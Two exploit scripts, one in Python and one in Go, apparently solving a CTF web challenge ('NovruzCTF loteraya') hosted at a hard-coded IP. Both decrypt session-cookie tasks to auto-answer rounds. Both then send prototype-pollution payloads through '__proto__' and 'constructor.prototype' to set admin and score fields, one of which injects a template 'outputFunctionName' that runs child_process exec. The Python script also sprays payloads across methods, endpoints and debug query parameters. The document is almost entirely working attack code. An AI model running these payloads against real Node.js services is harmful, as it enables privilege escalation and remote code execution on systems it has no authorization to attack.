File: CTF_Writeups/scripts_python/NovruzCTF_loteraya.py
import requests
import base64
import json
import re
import time

URL = "http://95.111.234.103:2900"

from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP

def get_sd(sess):
    c = sess.cookies.get('session')
    if not c: return None
    p = 4 - len(c)%4
    if p!=4: c+='='*p
    return json.loads(base64.b64decode(c))

def decrypt(task, pk):
    key = RSA.import_key(pk)
    cb = base64.b64decode(task['c'])
    bs = key.size_in_bytes()
    pt = b''
    for i in range(0,len(cb),bs):
        pt += PKCS1_OAEP.new(key).decrypt(cb[i:i+bs])
    return pt.decode()

def solve_one(sess):
    sd = get_sd(sess)
    pt = decrypt(sd['task'], sd['key'])
    ans = re.findall(r'-?\d+', pt)[0]
    r = sess.post(f"{URL}/check-task", json={"input": ans})
    return r.json()

def solve_with_pollution(sess, pollution_json):
    """Solve one round while also sending prototype pollution payload"""
    sd = get_sd(sess)
    pt = decrypt(sd['task'], sd['key'])
    ans = re.findall(r'-?\d+', pt)[0]
    # Merge the correct answer with the pollution payload
    payload = json.loads(pollution_json)
    payload['input'] = ans
    r = sess.post(f"{URL}/check-task",
                 data=json.dumps(payload),
                 headers={"Content-Type": "application/json"})
    return r.json()

# ============================================================
# Strategy: Send various prototype pollution payloads, then
# check if a NEW session is affected (global pollution)
# ============================================================

pollution_payloads = [
    # Standard __proto__
    '{"__proto__": {"isAdmin": true, "correctAnswers": 99999, "flag": true, "win": true}}',
    # constructor.prototype (more likely to cause global pollution)
    '{"constructor": {"prototype": {"isAdmin": true, "correctAnswers": 99999}}}',
    # Nested deeper
    '{"__proto__": {"__proto__": {"isAdmin": true}}}',
    # Try setting specific app config
    '{"__proto__": {"threshold": 0, "minScore": 0, "requiredAnswers": 0}}',
    '{"constructor": {"prototype": {"threshold": 0, "minScore": 0, "requiredAnswers": 0}}}',
    # Try to pollute session properties
    '{"__proto__": {"outputFunctionName": "x]};process.mainModule.require(\'child_process\').exec(\'id\')//", "correctAnswers": 99999}}',
]

for i, pp in enumerate(pollution_payloads):
    print(f"\n=== Pollution payload {i} ===")
    print(f"  {pp[:80]}...")

    # Session A: Send pollution
    sa = requests.Session()
    sa.get(f"{URL}/generate-task")
    result = solve_with_pollution(sa, pp)
    print(f"  Pollution response: success={result.get('success')}, answered={result.get('answered')}")

    # Check ALL fields in response
    for k, v in result.items():
        if k != 'task':
            vs = str(v).lower()
            if 'flag' in vs or 'novruz' in vs or '{' in str(v):
                print(f"  *** POSSIBLE FLAG: {k}={v} ***")

    # Session B: NEW session - check if pollution persists globally
    sb = requests.Session()
    sb.get(f"{URL}/generate-task")
    sd_b = get_sd(sb)

    # Check if new session has polluted properties
    extra = {k:v for k,v in sd_b.items() if k not in ('key','task')}
    if extra:
        print(f"  New session extras: {extra}")

    # Try solving with new session - check response
    result_b = solve_one(sb)
    print(f"  New session result: { {k:v for k,v in result_b.items() if k != 'task'} }")

    sd_b2 = get_sd(sb)
    extra2 = {k:v for k,v in sd_b2.items() if k not in ('key','task')}
    print(f"  New session after solve: {extra2}")

    # Also check if generate-task returns more fields now
    resp = sb.get(f"{URL}/generate-task")
    rd = resp.json()
    gen_extra = {k:v for k,v in rd.items() if k != 'task'}
    if gen_extra:
        print(f"  generate-task extras: {gen_extra}")

    # Check main page
    r = sb.get(URL)
    if 'flag' in r.text.lower() or 'novruz' in r.text.lower():
        print(f"  *** FLAG IN HTML ***")
        print(r.text)

# ============================================================
# Try a different approach: send pollution as a separate
# request body WITHOUT the input field
# ============================================================
print("\n\n=== Pollution without input field ===")
sa = requests.Session()
sa.get(f"{URL}/generate-task")

# Send pure pollution payload to various endpoints
for ep in ['/check-task', '/generate-task', '/']:
    for method in ['POST', 'PUT', 'PATCH']:
        pollution = '{"__proto__": {"correctAnswers": 99999, "isAdmin": true, "flag": true}}'
        try:
            r = sa.request(method, f"{URL}{ep}",
                          data=pollution,
                          headers={"Content-Type": "application/json"},
                          timeout=5)
            if r.status_code != 404 and 'Cannot' not in r.text:
                print(f"  {method} {ep}: {r.status_code} - {r.text[:150]}")
        except:
            pass

# ============================================================
# Check: maybe the flag is revealed via a query parameter
# after solving enough rounds
# ============================================================
print("\n=== Query parameter approach ===")
sa = requests.Session()
sa.get(f"{URL}/generate-task")
# Solve 10 rounds first
for _ in range(10):
    solve_one(sa)

sd = get_sd(sa)
print(f"correctAnswers: {sd.get('correctAnswers')}")

# Try various query params on generate-task
for params in [
    {"getFlag": "true"},
    {"flag": "1"},
    {"admin": "true"},
    {"debug": "1"},
    {"showFlag": "1"},
]:
    r = sa.get(f"{URL}/generate-task", params=params)
    rd = r.json()
    extra = {k:v for k,v in rd.items() if k != 'task'}
    if extra:
        print(f"  {params}: {extra}")

File: scripts_go/NovruzCTF_loteraya.go
package main

import (
	"bytes"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha1"
	"crypto/x509"
	"encoding/base64"
	"encoding/json"
	"encoding/pem"
	"fmt"
	"io"
	"net/http"
	"net/http/cookiejar"
	"net/url"
	"regexp"
	"strings"
	"time"
)

const baseURL = "http://95.111.234.103:2900"

var numRe = regexp.MustCompile(`-?\d+`)

type Task struct {
	N string `json:"n"`
	E int    `json:"e"`
	C string `json:"c"`
}

type SessionData struct {
	Key            string `json:"key"`
	Task           Task   `json:"task"`
	CorrectAnswers int    `json:"correctAnswers"`
}

func newClient() *http.Client {
	jar, _ := cookiejar.New(nil)
	return &http.Client{Timeout: 10 * time.Second, Jar: jar}
}

func decodeCookie(val string) ([]byte, error) {
	padded := val
	if m := len(padded) % 4; m != 0 {
		padded += strings.Repeat("=", 4-m)
	}
	if b, err := base64.StdEncoding.DecodeString(padded); err == nil {
		return b, nil
	}
	if b, err := base64.URLEncoding.DecodeString(padded); err == nil {
		return b, nil
	}
	return nil, fmt.Errorf("invalid base64 cookie")
}

func getSessionData(c *http.Client) (*SessionData, map[string]any, error) {
	u, _ := url.Parse(baseURL)
	cookies := c.Jar.Cookies(u)
	var val string
	for _, ck := range cookies {
		if ck.Name == "session" {
			val = ck.Value
			break
		}
	}
	if val == "" {
		return nil, nil, fmt.Errorf("session cookie not found")
	}
	raw, err := decodeCookie(val)
	if err != nil {
		return nil, nil, err
	}
	var m map[string]any
	if err := json.Unmarshal(raw, &m); err != nil {
		return nil, nil, err
	}
	var sd SessionData
	if err := json.Unmarshal(raw, &sd); err != nil {
		return nil, nil, err
	}
	return &sd, m, nil
}

func parsePrivateKey(pemStr string) (*rsa.PrivateKey, error) {
	block, _ := pem.Decode([]byte(pemStr))
	if block == nil {
		return nil, fmt.Errorf("invalid pem")
	}
	if k, err := x509.ParsePKCS8PrivateKey(block.Bytes); err == nil {
		return k.(*rsa.PrivateKey), nil
	}
	if k, err := x509.ParsePKCS1PrivateKey(block.Bytes); err == nil {
		return k, nil
	}
	return nil, fmt.Errorf("unsupported key format")
}

func decodeCipher(b64 string) ([]byte, error) {
	if b, err := base64.StdEncoding.DecodeString(b64); err == nil {
		return b, nil
	}
	if b, err := base64.URLEncoding.DecodeString(b64); err == nil {
		return b, nil
	}
	return nil, fmt.Errorf("invalid cipher base64")
}

func decryptTask(task Task, pemKey string) (string, error) {
	key, err := parsePrivateKey(pemKey)
	if err != nil {
		return "", err
	}
	cBytes, err := decodeCipher(task.C)
	if err != nil {
		return "", err
	}
	out := make([]byte, 0)
	for i := 0; i < len(cBytes); i += key.Size() {
		h := sha1.New()
		part, err := rsa.DecryptOAEP(h, rand.Reader, key, cBytes[i:i+key.Size()], nil)
		if err != nil {
			return "", err
		}
		out = append(out, part...)
	}
	return string(out), nil
}

func generateTask(c *http.Client) (map[string]any, error) {
	resp, err := c.Get(baseURL + "/generate-task")
	if err != nil {
		return nil, err
	}
	defer resp.Body.Close()
	var m map[string]any
	if err := json.NewDecoder(resp.Body).Decode(&m); err != nil {
		return nil, err
	}
	return m, nil
}

func solveOne(c *http.Client) (map[string]any, error) {
	sd, _, err := getSessionData(c)
	if err != nil {
		return nil, err
	}
	pt, err := decryptTask(sd.Task, sd.Key)
	if err != nil {
		return nil, err
	}
	ans := numRe.FindString(pt)
	payload := map[string]string{"input": ans}
	b, _ := json.Marshal(payload)
	resp, err := c.Post(baseURL+"/check-task", "application/json", bytes.NewReader(b))
	if err != nil {
		return nil, err
	}
	defer resp.Body.Close()
	var m map[string]any
	if err := json.NewDecoder(resp.Body).Decode(&m); err != nil {
		return nil, err
	}
	return m, nil
}

func solveWithPollution(c *http.Client, pollutionJSON string) (map[string]any, error) {
	sd, _, err := getSessionData(c)
	if err != nil {
		return nil, err
	}
	pt, err := decryptTask(sd.Task, sd.Key)
	if err != nil {
		return nil, err
	}
	ans := numRe.FindString(pt)

	var payload map[string]any
	if err := json.Unmarshal([]byte(pollutionJSON), &payload); err != nil {
		return nil, err
	}
	payload["input"] = ans
	b, _ := json.Marshal(payload)
	req, _ := http.NewRequest("POST", baseURL+"/check-task", bytes.NewReader(b))
	req.Header.Set("Content-Type", "application/json")
	resp, err := c.Do(req)
	if err != nil {
		return nil, err
	}
	defer resp.Body.Close()
	var m map[string]any
	if err := json.NewDecoder(resp.Body).Decode(&m); err != nil {
		return nil, err
	}
	return m, nil
}

func printExtras(prefix string, m map[string]any) {
	extras := make(map[string]any)
	for k, v := range m {
		if k == "key" || k == "task" {
			continue
		}
		extras[k] = v
	}
	if len(extras) > 0 {
		fmt.Printf("%s%v\n", prefix, extras)
	}
}

func printPossibleFlags(m map[string]any) {
	for k, v := range m {
		if k == "task" {
			continue
		}
		vs := strings.ToLower(fmt.Sprint(v))
		if strings.Contains(vs, "flag") || strings.Contains(vs, "novruz") || strings.Contains(fmt.Sprint(v), "{") {
			fmt.Printf("  *** POSSIBLE FLAG: %s=%v ***\n", k, v)
		}
	}
}

func filterResult(m map[string]any) map[string]any {
	out := make(map[string]any)
	for k, v := range m {
		if k != "task" {
			out[k] = v
		}
	}
	return out
}

func checkMainPage(c *http.Client) {
	resp, err := c.Get(baseURL + "/")
	if err != nil {
		return
	}
	defer resp.Body.Close()
	b, _ := io.ReadAll(resp.Body)
	text := strings.ToLower(string(b))
	if strings.Contains(text, "flag") || strings.Contains(text, "novruz") {
		fmt.Println("  *** FLAG IN HTML ***")
		fmt.Println(string(b))
	}
}

func main() {
	pollutionPayloads := []string{
		`{"__proto__": {"isAdmin": true, "correctAnswers": 99999, "flag": true, "win": true}}`,
		`{"constructor": {"prototype": {"isAdmin": true, "correctAnswers": 99999}}}`,
		`{"__proto__": {"__proto__": {"isAdmin": true}}}`,
		`{"__proto__": {"threshold": 0, "minScore": 0, "requiredAnswers": 0}}`,
		`{"constructor": {"prototype": {"threshold": 0, "minScore": 0, "requiredAnswers": 0}}}`,
		`{"__proto__": {"outputFunctionName": "x]};process.mainModule.require('child_process').exec('id')//", "correctAnswers": 99999}}`,
	}

	for i, pp := range pollutionPayloads {
		fmt.Printf("\n=== Pollution payload %d ===\n", i)
		fmt.Printf("  %s...\n", pp)

		sa := newClient()
		_, _ = generateTask(sa)
		res, err := solveWithPollution(sa, pp)
		if err != nil {
			fmt.Println("  pollution error:", err)
			continue
		}
		fmt.Printf("  Pollution response: success=%v, answered=%v\n", res["success"], res["answered"])
		printPossibleFlags(res)

		sb := newClient()
		gen, _ := generateTask(sb)
		_, smap, _ := getSessionData(sb)
		printExtras("  New session extras: ", smap)

		resB, err := solveOne(sb)
		if err == nil {
			fmt.Printf("  New session result: %v\n", filterResult(resB))
		}
		_, smap2, _ := getSessionData(sb)
		printExtras("  New session after solve: ", smap2)

		if gen != nil {
			printExtras("  generate-task extras: ", gen)
		}
		gen2, _ := generateTask(sb)
		if gen2 != nil {
			printExtras("  generate-task extras: ", gen2)
		}
		checkMainPage(sb)
	}
}
